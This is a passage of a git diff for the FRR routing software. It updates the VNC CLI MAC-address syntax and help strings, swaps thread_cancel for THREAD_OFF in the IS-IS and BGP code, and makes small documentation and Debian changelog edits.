- "add vnc mac YY:YY:YY:YY:YY:YY virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M> cost (0-255) lifetime (1-4294967295)",
+ "add vnc mac X:X:X:X:X:X virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M> cost (0-255) lifetime (1-4294967295)",
"Add registration\n"
"VNC Information\n"
"Add/modify mac address information\n"
@@ -2545,7 +2539,7 @@ DEFUN (add_vnc_mac_vni_prefix_cost_life,
DEFUN (add_vnc_mac_vni_prefix_life,
add_vnc_mac_vni_prefix_life_cmd,
- "add vnc mac YY:YY:YY:YY:YY:YY virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M> lifetime (1-4294967295)",
+ "add vnc mac X:X:X:X:X:X virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M> lifetime (1-4294967295)",
"Add registration\n"
"VNC Information\n"
"Add/modify mac address information\n"
@@ -2572,7 +2566,7 @@ DEFUN (add_vnc_mac_vni_prefix_life,
DEFUN (add_vnc_mac_vni_prefix_cost,
add_vnc_mac_vni_prefix_cost_cmd,
- "add vnc mac YY:YY:YY:YY:YY:YY virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M> cost (0-255)",
+ "add vnc mac X:X:X:X:X:X virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M> cost (0-255)",
"Add registration\n"
"VNC Information\n"
"Add/modify mac address information\n"
@@ -2598,7 +2592,7 @@ DEFUN (add_vnc_mac_vni_prefix_cost,
DEFUN (add_vnc_mac_vni_prefix,
add_vnc_mac_vni_prefix_cmd,
- "add vnc mac YY:YY:YY:YY:YY:YY virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M>",
+ "add vnc mac X:X:X:X:X:X virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M>",
"Add registration\n"
"VNC Information\n"
"Add/modify mac address information\n"
@@ -2622,7 +2616,7 @@ DEFUN (add_vnc_mac_vni_prefix,
DEFUN (add_vnc_mac_vni_cost_life,
add_vnc_mac_vni_cost_life_cmd,
- "add vnc mac YY:YY:YY:YY:YY:YY virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> cost (0-255) lifetime (1-4294967295)",
+ "add vnc mac X:X:X:X:X:X virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> cost (0-255) lifetime (1-4294967295)",
"Add registration\n"
"VNC Information\n"
"Add/modify mac address information\n"
@@ -2649,7 +2643,7 @@ DEFUN (add_vnc_mac_vni_cost_life,
DEFUN (add_vnc_mac_vni_cost,
add_vnc_mac_vni_cost_cmd,
- "add vnc mac YY:YY:YY:YY:YY:YY virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> cost (0-255)",
+ "add vnc mac X:X:X:X:X:X virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> cost (0-255)",
"Add registration\n"
"VNC Information\n"
"Add/modify mac address information\n"
@@ -2673,7 +2667,7 @@ DEFUN (add_vnc_mac_vni_cost,
DEFUN (add_vnc_mac_vni_life,
add_vnc_mac_vni_life_cmd,
- "add vnc mac YY:YY:YY:YY:YY:YY virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> lifetime (1-4294967295)",
+ "add vnc mac X:X:X:X:X:X virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> lifetime (1-4294967295)",
"Add registration\n"
"VNC Information\n"
"Add/modify mac address information\n"
@@ -2698,7 +2692,7 @@ DEFUN (add_vnc_mac_vni_life,
DEFUN (add_vnc_mac_vni,
add_vnc_mac_vni_cmd,
- "add vnc mac YY:YY:YY:YY:YY:YY virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X>",
+ "add vnc mac X:X:X:X:X:X virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X>",
"Add registration\n"
"VNC Information\n"
"Add/modify mac address information\n"
@@ -3749,7 +3743,7 @@ DEFUN (clear_vnc_prefix_all,
*/
DEFUN (clear_vnc_mac_vn_un,
clear_vnc_mac_vn_un_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> vn <*|A.B.C.D|X:X::X:X> un <*|A.B.C.D|X:X::X:X>",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> vn <*|A.B.C.D|X:X::X:X> un <*|A.B.C.D|X:X::X:X>",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -3782,7 +3776,7 @@ DEFUN (clear_vnc_mac_vn_un,
DEFUN (clear_vnc_mac_un_vn,
clear_vnc_mac_un_vn_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> un <*|A.B.C.D|X:X::X:X> vn <*|A.B.C.D|X:X::X:X>",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> un <*|A.B.C.D|X:X::X:X> vn <*|A.B.C.D|X:X::X:X>",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -3815,7 +3809,7 @@ DEFUN (clear_vnc_mac_un_vn,
DEFUN (clear_vnc_mac_un,
clear_vnc_mac_un_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> un <*|A.B.C.D|X:X::X:X>",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> un <*|A.B.C.D|X:X::X:X>",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -3844,7 +3838,7 @@ DEFUN (clear_vnc_mac_un,
DEFUN (clear_vnc_mac_vn,
clear_vnc_mac_vn_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> vn <*|A.B.C.D|X:X::X:X>",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> vn <*|A.B.C.D|X:X::X:X>",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -3873,7 +3867,7 @@ DEFUN (clear_vnc_mac_vn,
DEFUN (clear_vnc_mac_all,
clear_vnc_mac_all_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> *",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> *",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -3903,7 +3897,7 @@ DEFUN (clear_vnc_mac_all,
DEFUN (clear_vnc_mac_vn_un_prefix,
clear_vnc_mac_vn_un_prefix_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> vn <*|A.B.C.D|X:X::X:X> un <*|A.B.C.D|X:X::X:X> prefix <*|A.B.C.D/M|X:X::X:X/M>",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> vn <*|A.B.C.D|X:X::X:X> un <*|A.B.C.D|X:X::X:X> prefix <*|A.B.C.D/M|X:X::X:X/M>",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -3940,7 +3934,7 @@ DEFUN (clear_vnc_mac_vn_un_prefix,
DEFUN (clear_vnc_mac_un_vn_prefix,
clear_vnc_mac_un_vn_prefix_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> un <*|A.B.C.D|X:X::X:X> vn <*|A.B.C.D|X:X::X:X> prefix <*|A.B.C.D/M|X:X::X:X/M> prefix <*|A.B.C.D/M|X:X::X:X/M>",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> un <*|A.B.C.D|X:X::X:X> vn <*|A.B.C.D|X:X::X:X> prefix <*|A.B.C.D/M|X:X::X:X/M> prefix <*|A.B.C.D/M|X:X::X:X/M>",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -3981,7 +3975,7 @@ DEFUN (clear_vnc_mac_un_vn_prefix,
DEFUN (clear_vnc_mac_un_prefix,
clear_vnc_mac_un_prefix_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> un <*|A.B.C.D|X:X::X:X> prefix <*|A.B.C.D/M|X:X::X:X/M>",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> un <*|A.B.C.D|X:X::X:X> prefix <*|A.B.C.D/M|X:X::X:X/M>",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -4014,7 +4008,7 @@ DEFUN (clear_vnc_mac_un_prefix,
DEFUN (clear_vnc_mac_vn_prefix,
clear_vnc_mac_vn_prefix_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> vn <*|A.B.C.D|X:X::X:X> prefix <*|A.B.C.D/M|X:X::X:X/M>",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> vn <*|A.B.C.D|X:X::X:X> prefix <*|A.B.C.D/M|X:X::X:X/M>",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -4047,7 +4041,7 @@ DEFUN (clear_vnc_mac_vn_prefix,
DEFUN (clear_vnc_mac_all_prefix,
clear_vnc_mac_all_prefix_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> prefix <*|A.B.C.D/M|X:X::X:X/M>",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> prefix <*|A.B.C.D/M|X:X::X:X/M>",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -4395,13 +4389,15 @@ static void rfapi_show_registrations(struct vty *vty,
DEFUN (vnc_show_registrations_pfx,
vnc_show_registrations_pfx_cmd,
- "show vnc registrations [<A.B.C.D/M|X:X::X:X/M|YY:YY:YY:YY:YY:YY>]",
+ "show vnc registrations [<A.B.C.D|A.B.C.D/M|X:X::X:X|X:X::X:X/M|X:X:X:X:X:X>]",
SHOW_STR
VNC_SHOW_STR
"List active prefix registrations\n"
+ "Limit output to a particualr IPV4 address\n"
"Limit output to a particular IPv4 prefix\n"
+ "Limit output to a particualr IPV6 address\n"
"Limit output to a particular IPv6 prefix\n"
- "Limit output to a particular IPv6 address\n")
+ "Limit output to a particular MAC address\n")
{
struct prefix p;
struct prefix *p_addr = NULL;
@@ -4421,7 +4417,7 @@ DEFUN (vnc_show_registrations_pfx,
DEFUN (vnc_show_registrations_some_pfx,
vnc_show_registrations_some_pfx_cmd,
- "show vnc registrations <all|holddown|imported|local|remote> [<A.B.C.D/M|X:X::X:X/M|YY:YY:YY:YY:YY:YY>]",
+ "show vnc registrations <all|holddown|imported|local|remote> [<A.B.C.D|A.B.C.D/M|X:X::X:X|X:X::X:X/M|X:X:X:X:X:X>]",
SHOW_STR
VNC_SHOW_STR
"List active prefix registrations\n"
@@ -4430,9 +4426,11 @@ DEFUN (vnc_show_registrations_some_pfx,
"show only imported prefixes\n"
"show only local registrations\n"
"show only remote registrations\n"
- "Limit output to a particular prefix or address\n"
- "Limit output to a particular prefix or address\n"
- "Limit output to a particular prefix or address\n")
+ "Limit output to a particualr IPV4 address\n"
+ "Limit output to a particular IPv4 prefix\n"
+ "Limit output to a particualr IPV6 address\n"
+ "Limit output to a particular IPv6 prefix\n"
+ "Limit output to a particular MAC address\n")
{
struct prefix p;
struct prefix *p_addr = NULL;
@@ -4482,13 +4480,15 @@ DEFUN (vnc_show_registrations_some_pfx,
DEFUN (vnc_show_responses_pfx,
vnc_show_responses_pfx_cmd,
- "show vnc responses [<A.B.C.D/M|X:X::X:X/M|YY:YY:YY:YY:YY:YY>]",
+ "show vnc responses [<A.B.C.D|A.B.C.D/M|X:X::X:X|X:X::X:X/M|X:X:X:X:X:X>]",
SHOW_STR
VNC_SHOW_STR
"List recent query responses\n"
+ "Limit output to a particualr IPV4 address\n"
"Limit output to a particular IPv4 prefix\n"
+ "Limit output to a particualr IPV6 address\n"
"Limit output to a particular IPv6 prefix\n"
- "Limit output to a particular IPv6 address\n" )
+ "Limit output to a particular MAC address\n" )
{
struct prefix p;
struct prefix *p_addr = NULL;
@@ -4513,15 +4513,17 @@ DEFUN (vnc_show_responses_pfx,
DEFUN (vnc_show_responses_some_pfx,
vnc_show_responses_some_pfx_cmd,
- "show vnc responses <active|removed> [<A.B.C.D/M|X:X::X:X/M|YY:YY:YY:YY:YY:YY>]",
+ "show vnc responses <active|removed> [<A.B.C.D|A.B.C.D/M|X:X::X:X|X:X::X:X/M|X:X:X:X:X:X>]",
SHOW_STR
VNC_SHOW_STR
"List recent query responses\n"
"show only active query responses\n"
"show only removed query responses\n"
+ "Limit output to a particualr IPV4 address\n"
"Limit output to a particular IPv4 prefix\n"
+ "Limit output to a particualr IPV6 address\n"
"Limit output to a particular IPv6 prefix\n"
- "Limit output to a particular IPV6 address\n")
+ "Limit output to a particular MAC address\n")
{
struct prefix p;
struct prefix *p_addr = NULL;
@@ -4565,13 +4567,15 @@ DEFUN (vnc_show_responses_some_pfx,
DEFUN (show_vnc_queries_pfx,
show_vnc_queries_pfx_cmd,
- "show vnc queries [<A.B.C.D/M|X:X::X:X/M|YY:YY:YY:YY:YY:YY>]",
+ "show vnc queries [<A.B.C.D|A.B.C.D/M|X:X::X:X|X:X::X:X/M|X:X:X:X:X:X>]",
SHOW_STR
VNC_SHOW_STR
"List active queries\n"
- "Limit output to a particular IPv4 prefix or address\n"
+ "Limit output to a particualr IPV4 address\n"
+ "Limit output to a particular IPv4 prefix\n"
+ "Limit output to a particualr IPV6 address\n"
"Limit output to a particular IPv6 prefix\n"
- "Limit output to a particualr IPV6 address\n")
+ "Limit output to a particualr MAC address\n")
{
struct prefix pfx;
struct prefix *p = NULL;
diff --git a/bgpd/rfapi/vnc_export_bgp.c b/bgpd/rfapi/vnc_export_bgp.c
index 7cfa2ed67d..05e45bc4c8 100644
--- a/bgpd/rfapi/vnc_export_bgp.c
+++ b/bgpd/rfapi/vnc_export_bgp.c
@@ -564,7 +564,6 @@ static struct ecommunity *vnc_route_origin_ecom_single(struct in_addr *origin)
roec.val[7] = 0;
new = ecommunity_new();
- assert(new);
ecommunity_add_val(new, &roec, false, false);
if (!new->size) {
@@ -1713,7 +1712,7 @@ void vnc_direct_bgp_rh_add_route(struct bgp *bgp, afi_t afi,
* export expiration timer is already running on
* this route: cancel it
*/
- thread_cancel(&eti->timer);
+ THREAD_OFF(eti->timer);
bgp_update(peer, prefix, /* prefix */
0, /* addpath_id */
@@ -1727,7 +1726,7 @@ void vnc_direct_bgp_rh_add_route(struct bgp *bgp, afi_t afi,
static void vncExportWithdrawTimer(struct thread *t)
{
- struct vnc_export_info *eti = t->arg;
+ struct vnc_export_info *eti = THREAD_ARG(t);
const struct prefix *p = agg_node_get_prefix(eti->node);
/*
@@ -1944,7 +1943,7 @@ void vnc_direct_bgp_rh_vpn_enable(struct bgp *bgp, afi_t afi)
* already running on
* this route: cancel it
*/
- thread_cancel(&eti->timer);
+ THREAD_OFF(eti->timer);
vnc_zlog_debug_verbose(
"%s: calling bgp_update",
@@ -2013,7 +2012,7 @@ void vnc_direct_bgp_rh_vpn_disable(struct bgp *bgp, afi_t afi)
ZEBRA_ROUTE_VNC_DIRECT_RH,
BGP_ROUTE_REDISTRIBUTE);
if (eti) {
- thread_cancel(&eti->timer);
+ THREAD_OFF(eti->timer);
vnc_eti_delete(eti);
}
diff --git a/bgpd/rfapi/vnc_export_table.c b/bgpd/rfapi/vnc_export_table.c
index 255f868bdf..743576d265 100644
--- a/bgpd/rfapi/vnc_export_table.c
+++ b/bgpd/rfapi/vnc_export_table.c
@@ -119,7 +119,6 @@ struct vnc_export_info *vnc_eti_get(struct bgp *bgp, vnc_export_type_t etype,
agg_unlock_node(etn);
} else {
eti = XCALLOC(MTYPE_RFAPI_ETI, sizeof(struct vnc_export_info));
- assert(eti);
eti->node = etn;
eti->peer = peer;
peer_lock(peer);
diff --git a/bgpd/rfapi/vnc_zebra.c b/bgpd/rfapi/vnc_zebra.c
index 293f88d1df..fe818987b8 100644
--- a/bgpd/rfapi/vnc_zebra.c
+++ b/bgpd/rfapi/vnc_zebra.c
@@ -193,7 +193,7 @@ static void vnc_redistribute_add(struct prefix *p, uint32_t metric,
* is not strictly necessary, but serves as a reminder
* to those who may meddle...
*/
- frr_with_mutex(&vncHD1VR.peer->io_mtx) {
+ frr_with_mutex (&vncHD1VR.peer->io_mtx) {
// we don't need any I/O related facilities
if (vncHD1VR.peer->ibuf)
stream_fifo_free(vncHD1VR.peer->ibuf);
diff --git a/debian/changelog b/debian/changelog
index feaf92d073..9c14270b66 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,10 +1,16 @@
frr (8.4~dev-1) UNRELEASED; urgency=medium
- * New upstream release...
+ * FRR Dev 8.4
- -- Donatas Abraitis <donatas@opensourcerouting.org> Tue, 07 May 2022 23:00:00 +0300
+ -- Jafar Al-Gharaibeh <jafar@atcorp.com> Wed, 20 Jul 2022 10:00:00 +0500
-frr (8.2-0) UNRELEASED; urgency=medium
+frr (8.3-0) unstable; urgency=medium
+
+ * New upstream release FRR 8.3
+
+ -- Jafar Al-Gharaibeh <jafar@atcorp.com> Wed, 13 Jul 2022 10:00:00 +0500
+
+frr (8.2-0) unstable; urgency=medium
* New upstream release FRR 8.2
diff --git a/doc/developer/locking.rst b/doc/developer/locking.rst
index c8366480d2..bce1311188 100644
--- a/doc/developer/locking.rst
+++ b/doc/developer/locking.rst
@@ -7,7 +7,7 @@ FRR ships two small wrappers around ``pthread_mutex_lock()`` /
``pthread_mutex_unlock``. Use ``#include "frr_pthread.h"`` to get these
macros.
-.. c:macro:: frr_with_mutex(mutex)
+.. c:macro:: frr_with_mutex (mutex)
(With ``pthread_mutex_t *mutex``.)
@@ -17,7 +17,7 @@ macros.
int somefunction(int option)
{
- frr_with_mutex(&my_mutex) {
+ frr_with_mutex (&my_mutex) {
/* mutex will be locked */
if (!option)
diff --git a/doc/developer/rcu.rst b/doc/developer/rcu.rst
index c8248194b7..ac4405121e 100644
--- a/doc/developer/rcu.rst
+++ b/doc/developer/rcu.rst
@@ -13,7 +13,7 @@ operation (and not a set of APIs.) The core ideas are:
"invisible" copies. Other threads, when they access the structure, see an
older (but consistent) copy.
-* once done, the updated copy is swapped in in a single operation so that
+* once done, the updated copy is swapped in a single operation so that
other threads see either the old or the new data but no inconsistent state
between.
diff --git a/doc/developer/topotests.rst b/doc/developer/topotests.rst
index 6c1d9148d1..ada182d847 100644
--- a/doc/developer/topotests.rst
+++ b/doc/developer/topotests.rst
@@ -38,6 +38,12 @@ Installing Topotest Requirements
# To enable the gRPC topotest install:
python3 -m pip install grpcio grpcio-tools
+ # Install Socat tool to run PIMv6 tests,
+ # Socat code can be taken from below url,
+ # which has latest changes done for PIMv6,
+ # join and traffic:
+ https://github.com/opensourcerouting/socat/
+
Enable Coredumps
""""""""""""""""
diff --git a/doc/user/bgp.rst b/doc/user/bgp.rst
index 28f59f205f..daaf80ae07 100644
--- a/doc/user/bgp.rst
+++ b/doc/user/bgp.rst
@@ -2827,6 +2827,14 @@ address-family:
The CLI will disallow attempts to configure incompatible leaking
modes.
+.. clicmd:: bgp retain route-target all
+
+It is possible to retain or not VPN prefixes that are not imported by local
+VRF configuration. This can be done via the following command in the context
+of the global VPNv4/VPNv6 family. This command defaults to on and is not
+displayed.
+The `no bgp retain route-target all` form of the command is displayed.
+
.. _bgp-l3vpn-srv6:
L3VPN SRv6
diff --git a/doc/user/pimv6.rst b/doc/user/pimv6.rst
index 9bbd6abd80..bda9eaec80 100644
--- a/doc/user/pimv6.rst
+++ b/doc/user/pimv6.rst
@@ -385,6 +385,10 @@ Clear commands reset various variables.
packet count, byte count and wrong interface to 0 and start count
up from this spot.
+.. clicmd:: clear ipv6 pim interfaces
+
+ Reset PIMv6 interfaces.
+
.. clicmd:: clear ipv6 pim oil
Rescan PIMv6 OIL (output interface list).
diff --git a/isisd/fabricd.c b/isisd/fabricd.c
index d431787ebb..a37cda1ce1 100644
--- a/isisd/fabricd.c
+++ b/isisd/fabricd.c
@@ -238,11 +238,11 @@ struct fabricd *fabricd_new(struct isis_area *area)
void fabricd_finish(struct fabricd *f)
{
- thread_cancel(&(f->initial_sync_timeout));
+ THREAD_OFF(f->initial_sync_timeout);
- thread_cancel(&(f->tier_calculation_timer));
+ THREAD_OFF(f->tier_calculation_timer);
- thread_cancel(&(f->tier_set_timer));
+ THREAD_OFF(f->tier_set_timer);
isis_spftree_del(f->spftree);
neighbor_lists_clear(f);
@@ -334,7 +334,7 @@ void fabricd_initial_sync_finish(struct isis_area *area)
f->initial_sync_circuit->interface->name);
f->initial_sync_state = FABRICD_SYNC_COMPLETE;
f->initial_sync_circuit = NULL;
- thread_cancel(&(f->initial_sync_timeout));
+ THREAD_OFF(f->initial_sync_timeout);
}
static void fabricd_bump_tier_calculation_timer(struct fabricd *f);
@@ -427,14 +427,14 @@ static void fabricd_bump_tier_calculation_timer(struct fabricd *f)
{
/* Cancel timer if we already know our tier */
if (f->tier != ISIS_TIER_UNDEFINED || f->tier_set_timer) {
- thread_cancel(&(f->tier_calculation_timer));
+ THREAD_OFF(f->tier_calculation_timer);
return;
}
/* If we need to calculate the tier, wait some
* time for the topology to settle before running
* the calculation */
- thread_cancel(&(f->tier_calculation_timer));
+ THREAD_OFF(f->tier_calculation_timer);
thread_add_timer(master, fabricd_tier_calculation_cb, f,
2 * f->area->lsp_gen_interval[ISIS_LEVEL2 - 1],
@@ -719,7 +719,7 @@ void fabricd_trigger_csnp(struct isis_area *area, bool circuit_scoped)
if (!circuit->t_send_csnp[1])
continue;
- thread_cancel(&(circuit->t_send_csnp[ISIS_LEVEL2 - 1]));
+ THREAD_OFF(circuit->t_send_csnp[ISIS_LEVEL2 - 1]);
thread_add_timer_msec(master, send_l2_csnp, circuit,
isis_jitter(f->csnp_delay, CSNP_JITTER),
&circuit->t_send_csnp[ISIS_LEVEL2 - 1]);
diff --git a/isisd/isis_adjacency.c b/isisd/isis_adjacency.c
index 11f17ec7bf..86cf10ae17 100644
--- a/isisd/isis_adjacency.c
+++ b/isisd/isis_adjacency.c
@@ -161,7 +161,7 @@ void isis_delete_adj(void *arg)
/* Remove self from snmp list without walking the list*/
list_delete_node(adj->circuit->snmp_adj_list, adj->snmp_list_node);
- thread_cancel(&adj->t_expire);
+ THREAD_OFF(adj->t_expire);
if (adj->adj_state != ISIS_ADJ_DOWN)
adj->adj_state = ISIS_ADJ_DOWN;
@@ -170,7 +170,7 @@ void isis_delete_adj(void *arg)
XFREE(MTYPE_ISIS_ADJACENCY_INFO, adj->area_addresses);
XFREE(MTYPE_ISIS_ADJACENCY_INFO, adj->ipv4_addresses);
XFREE(MTYPE_ISIS_ADJACENCY_INFO, adj->ll_ipv6_addrs);
-
+ XFREE(MTYPE_ISIS_ADJACENCY_INFO, adj->global_ipv6_addrs);
adj_mt_finish(adj);
list_delete(&adj->adj_sids);
diff --git a/isisd/isis_circuit.c b/isisd/isis_circuit.c
index 28d4b530fc..9e97e48937 100644
--- a/isisd/isis_circuit.c
+++ b/isisd/isis_circuit.c
@@ -845,12 +845,12 @@ void isis_circuit_down(struct isis_circuit *circuit)
memset(circuit->u.bc.l2_desig_is, 0, ISIS_SYS_ID_LEN + 1);
memset(circuit->u.bc.snpa, 0, ETH_ALEN);
- thread_cancel(&circuit->u.bc.t_send_lan_hello[0]);
- thread_cancel(&circuit->u.bc.t_send_lan_hello[1]);
- thread_cancel(&circuit->u.bc.t_run_dr[0]);
- thread_cancel(&circuit->u.bc.t_run_dr[1]);
- thread_cancel(&circuit->u.bc.t_refresh_pseudo_lsp[0]);
- thread_cancel(&circuit->u.bc.t_refresh_pseudo_lsp[1]);
+ THREAD_OFF(circuit->u.bc.t_send_lan_hello[0]);
+ THREAD_OFF(circuit->u.bc.t_send_lan_hello[1]);
+ THREAD_OFF(circuit->u.bc.t_run_dr[0]);
+ THREAD_OFF(circuit->u.bc.t_run_dr[1]);
+ THREAD_OFF(circuit->u.bc.t_refresh_pseudo_lsp[0]);
+ THREAD_OFF(circuit->u.bc.t_refresh_pseudo_lsp[1]);
circuit->lsp_regenerate_pending[0] = 0;
circuit->lsp_regenerate_pending[1] = 0;
@@ -860,7 +860,7 @@ void isis_circuit_down(struct isis_circuit *circuit)
} else if (circuit->circ_type == CIRCUIT_T_P2P) {
isis_delete_adj(circuit->u.p2p.neighbor);
circuit->u.p2p.neighbor = NULL;
- thread_cancel(&circuit->u.p2p.t_send_p2p_hello);
+ THREAD_OFF(circuit->u.p2p.t_send_p2p_hello);
}
/*
@@ -873,11 +873,11 @@ void isis_circuit_down(struct isis_circuit *circuit)
circuit->snmp_adj_idx_gen = 0;
/* Cancel all active threads */
- thread_cancel(&circuit->t_send_csnp[0]);
- thread_cancel(&circuit->t_send_csnp[1]);
- thread_cancel(&circuit->t_send_psnp[0]);
- thread_cancel(&circuit->t_send_psnp[1]);
- thread_cancel(&circuit->t_read);
+ THREAD_OFF(circuit->t_send_csnp[0]);
+ THREAD_OFF(circuit->t_send_csnp[1]);
+ THREAD_OFF(circuit->t_send_psnp[0]);
+ THREAD_OFF(circuit->t_send_psnp[1]);
+ THREAD_OFF(circuit->t_read);
if (circuit->tx_queue) {
isis_tx_queue_free(circuit->tx_queue);
diff --git a/isisd/isis_cli.c b/isisd/isis_cli.c
index bbc569ec1c..a673cb8c1e 100644
--- a/isisd/isis_cli.c
+++ b/isisd/isis_cli.c
@@ -1629,8 +1629,10 @@ DEFPY_YANG (isis_sr_prefix_sid,
if (strmatch(lh_behavior, "no-php-flag"))
value = "no-php";
- else
+ else if (strmatch(lh_behavior, "explicit-null"))
value = "explicit-null";
+ else
+ value = "php";
nb_cli_enqueue_change(vty, "./last-hop-behavior", NB_OP_MODIFY,
value);
diff --git a/isisd/isis_dr.c b/isisd/isis_dr.c
index 27b7388072..b9bf49867d 100644
--- a/isisd/isis_dr.c
+++ b/isisd/isis_dr.c
@@ -222,8 +222,8 @@ int isis_dr_resign(struct isis_circuit *circuit, int level)
circuit->u.bc.is_dr[level - 1] = 0;
circuit->u.bc.run_dr_elect[level - 1] = 0;
- thread_cancel(&circuit->u.bc.t_run_dr[level - 1]);
- thread_cancel(&circuit->u.bc.t_refresh_pseudo_lsp[level - 1]);
+ THREAD_OFF(circuit->u.bc.t_run_dr[level - 1]);
+ THREAD_OFF(circuit->u.bc.t_refresh_pseudo_lsp[level - 1]);
circuit->lsp_regenerate_pending[level - 1] = 0;
memcpy(id, circuit->isis->sysid, ISIS_SYS_ID_LEN);
@@ -247,7 +247,7 @@ int isis_dr_resign(struct isis_circuit *circuit, int level)
&circuit->t_send_psnp[1]);
}
- thread_cancel(&circuit->t_send_csnp[level - 1]);
+ THREAD_OFF(circuit->t_send_csnp[level - 1]);
thread_add_timer(master, isis_run_dr,
&circuit->level_arg[level - 1],
@@ -285,8 +285,6 @@ int isis_dr_commence(struct isis_circuit *circuit, int level)
circuit->circuit_id;
assert(circuit->circuit_id); /* must be non-zero */
- /* if (circuit->t_send_l1_psnp)
- thread_cancel (circuit->t_send_l1_psnp); */
lsp_generate_pseudo(circuit, 1);
thread_add_timer(master, send_l1_csnp, circuit,
@@ -307,8 +305,6 @@ int isis_dr_commence(struct isis_circuit *circuit, int level)
circuit->circuit_id;
assert(circuit->circuit_id); /* must be non-zero */
- /* if (circuit->t_send_l1_psnp)
- thread_cancel (circuit->t_send_l1_psnp); */
lsp_generate_pseudo(circuit, 2);
thread_add_timer(master, send_l2_csnp, circuit,
diff --git a/isisd/isis_dynhn.c b/isisd/isis_dynhn.c
index 8d76e81934..5d6b7bc60a 100644
--- a/isisd/isis_dynhn.c
+++ b/isisd/isis_dynhn.c
@@ -57,7 +57,7 @@ void dyn_cache_finish(struct isis *isis)
struct listnode *node, *nnode;
struct isis_dynhn *dyn;
- thread_cancel(&isis->t_dync_clean);
+ THREAD_OFF(isis->t_dync_clean);
for (ALL_LIST_ELEMENTS(isis->dyn_cache, node, nnode, dyn)) {
list_delete_node(isis->dyn_cache, node);
diff --git a/isisd/isis_events.c b/isisd/isis_events.c
index fce48fec97..42823cf2b3 100644
--- a/isisd/isis_events.c
+++ b/isisd/isis_events.c
@@ -109,13 +109,13 @@ static void circuit_resign_level(struct isis_circuit *circuit, int level)
circuit->area->area_tag, circuit->circuit_id,
circuit->interface->name, level);
- thread_cancel(&circuit->t_send_csnp[idx]);
- thread_cancel(&circuit->t_send_psnp[idx]);
+ THREAD_OFF(circuit->t_send_csnp[idx]);
